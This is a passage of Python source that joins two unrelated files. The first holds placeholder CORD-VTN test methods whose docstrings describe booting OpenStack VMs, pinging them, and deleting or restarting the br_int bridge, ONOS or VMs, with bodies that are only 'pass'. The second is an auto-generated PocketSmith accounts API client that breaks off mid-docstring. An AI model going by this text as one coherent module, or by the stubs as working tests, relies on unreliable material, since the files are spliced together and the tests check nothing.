4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till the VMs boot up and are running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping one VM from the other VM launched in the same network.
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete a VM which was created earlier and repeat steps 4 to 11.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till the VMs boot up and are running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping one VM from the other VM launched in the same network.
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete a br_int bridge and repeat steps 7 to 11, (it should not ping)
13) Add br_int bridge and repeat steps 7 to 11, (it should ping)
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_after_restarting_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from an outside network, i.e. the internet (global ping).
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart the VM in service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from an outside network, i.e. the internet (global ping).
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart onos service container and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_after_delete_and_recreate_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from an outside network, i.e. the internet (global ping).
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete and re-create a VM in the same service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from an outside network, i.e. the internet (global ping).
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete a br_int bridge and repeat steps 7 to 11, (it should not ping)
13) Add br_int bridge and repeat steps 7 to 11, (it should ping)
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_after_restarting_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from the compute node on which the VM is launched.
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart the VM in service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from the compute node on which the VM is launched.
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart the onos service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_after_delete_and_recreate_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from the compute node on which the VM is launched.
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete and re-create a VM in the same service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from the compute node on which the VM is launched.
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete a br_int bridge and repeat steps 7 to 11, (it should not ping)
13) Add br_int bridge and repeat steps 7 to 11, (it should ping)
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity_after_restarting_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management ip on VM.
8) Create the same virtual interface with a vlan tag and any local management ip on the head node.
9) Now ping the VM from the head node network on which the openstack service is launched.
10) Verify that the ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Restart the VM in service and repeat steps 9 to 13.
"""
pass
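# Hedged sketch of steps 7-8 (adding a VLAN-tagged virtual interface with a local
# management address, on the VM and on the head node). The parent interface name,
# VLAN id and address are placeholders; the plan does not fix them.
def sketch_add_vlan_interface(parent='eth0', vlan_id=100, address='172.27.0.10/24'):
    import subprocess

    subif = '{}.{}'.format(parent, vlan_id)
    # Create the tagged sub-interface, assign the local management address, bring it up.
    subprocess.check_call(['sudo', 'ip', 'link', 'add', 'link', parent,
                           'name', subif, 'type', 'vlan', 'id', str(vlan_id)])
    subprocess.check_call(['sudo', 'ip', 'addr', 'add', address, 'dev', subif])
    subprocess.check_call(['sudo', 'ip', 'link', 'set', subif, 'up'])
    return subif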
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management ip on VM.
8) Create the same virtual interface with a vlan tag and any local management ip on the head node.
9) Now ping the VM from the head node network on which the openstack service is launched.
10) Verify that the ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Restart the ONOS service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity_after_delete_and_recreate_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management ip on VM.
8) Create the same virtual interface with a vlan tag and any local management ip on the head node.
9) Now ping the VM from the head node network on which the openstack service is launched.
10) Verify that the ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Delete and re-create a VM in service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management ip on VM.
8) Create the same virtual interface with a vlan tag and any local management ip on the head node.
9) Now ping the VM from the head node network on which the openstack service is launched.
10) Verify that the ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Delete a br_int bridge and repeat steps 9 to 13, (it should not ping)
15) Add br_int bridge and repeat steps 9 to 13, (it should ping)
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity_after_restarting_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management floating ip on VM.
8) Create the same virtual interface with a vlan tag and any local management floating ip on the head node.
9) Now ping the VM from the head node network on which the openstack service is launched.
10) Verify that the ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Restart the VM in service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management floating ip on VM.
8) Create the same virtual interface with a vlan tag and any local management floating ip on the head node.
9) Now ping the VM from the head node network on which the openstack service is launched.
10) Verify that the ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Restart the ONOS service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity_after_delete_and_recreate_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management floating ip on VM.
8) Create the same virtual interface with a vlan tag and any local management floating ip on the head node.
9) Now ping the VM from the head node network on which the openstack service is launched.
10) Verify that the ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Delete and re-create a VM in service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management floating ip on VM.
8) Create the same virtual interface with a vlan tag and any local management floating ip on the head node.
9) Now ping the VM from the head node network on which the openstack service is launched.
10) Verify that the ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Delete a br_int bridge and repeat steps 9 to 13, (it should not ping)
15) Add br_int bridge and repeat steps 9 to 13, (it should ping)
"""
pass
# pocketsmith/api/accounts_api.py (theY4Kman/python-pocketsmith, MIT)
"""
PocketSmith
The public PocketSmith API # noqa: E501
The version of the OpenAPI document: 2.0+0.3.3
Contact: api@pocketsmith.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from pocketsmith.api_client import ApiClient, Endpoint as _Endpoint
from pocketsmith.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from pocketsmith.model.account import Account
from pocketsmith.model.inline_object import InlineObject
from pocketsmith.model.inline_object11 import InlineObject11
from pocketsmith.model.inline_response403 import InlineResponse403
class AccountsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.create_account_endpoint = _Endpoint(
settings={
'response_type': (Account,),
'auth': [
'developerKey'
],
'endpoint_path': '/users/{id}/accounts',
'operation_id': 'create_account',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'id',
'inline_object11',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
'inline_object11':
(InlineObject11,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'inline_object11': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.delete_account_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'developerKey'
],
'endpoint_path': '/accounts/{id}',
'operation_id': 'delete_account',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_account_endpoint = _Endpoint(
settings={
'response_type': (Account,),
'auth': [
'developerKey'
],
'endpoint_path': '/accounts/{id}',
'operation_id': 'get_account',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.list_accounts_endpoint = _Endpoint(
settings={
'response_type': ([Account],),
'auth': [
'developerKey'
],
'endpoint_path': '/users/{id}/accounts',
'operation_id': 'list_accounts',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.list_institution_accounts_endpoint = _Endpoint(
settings={
'response_type': ([Account],),
'auth': [
'developerKey'
],
'endpoint_path': '/institutions/{id}/accounts',
'operation_id': 'list_institution_accounts',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.update_account_endpoint = _Endpoint(
settings={
'response_type': (Account,),
'auth': [
'developerKey'
],
'endpoint_path': '/accounts/{id}',
'operation_id': 'update_account',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'id',
'inline_object',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
'inline_object':
(InlineObject,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'inline_object': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def create_account(
self,
id,
**kwargs
):
"""Create an account in user # noqa: E501
Creates and returns an account belonging to the user by their ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the user.
Keyword Args:
inline_object11 (InlineObject11): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Account
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.create_account_endpoint.call_with_http_info(**kwargs)
def delete_account(
self,
id,
**kwargs
):
"""Delete account # noqa: E501
Deletes an account and all its data by ID, optionally merging its scenarios into another account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the account.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.delete_account_endpoint.call_with_http_info(**kwargs)
def get_account(
self,
id,
**kwargs
):
"""Get account # noqa: E501
Gets an account by its ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the account.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Account
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.get_account_endpoint.call_with_http_info(**kwargs)
def list_accounts(
self,
id,
**kwargs
):
"""List accounts in user # noqa: E501
Lists all accounts belonging to the user by their ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_accounts(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the user.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
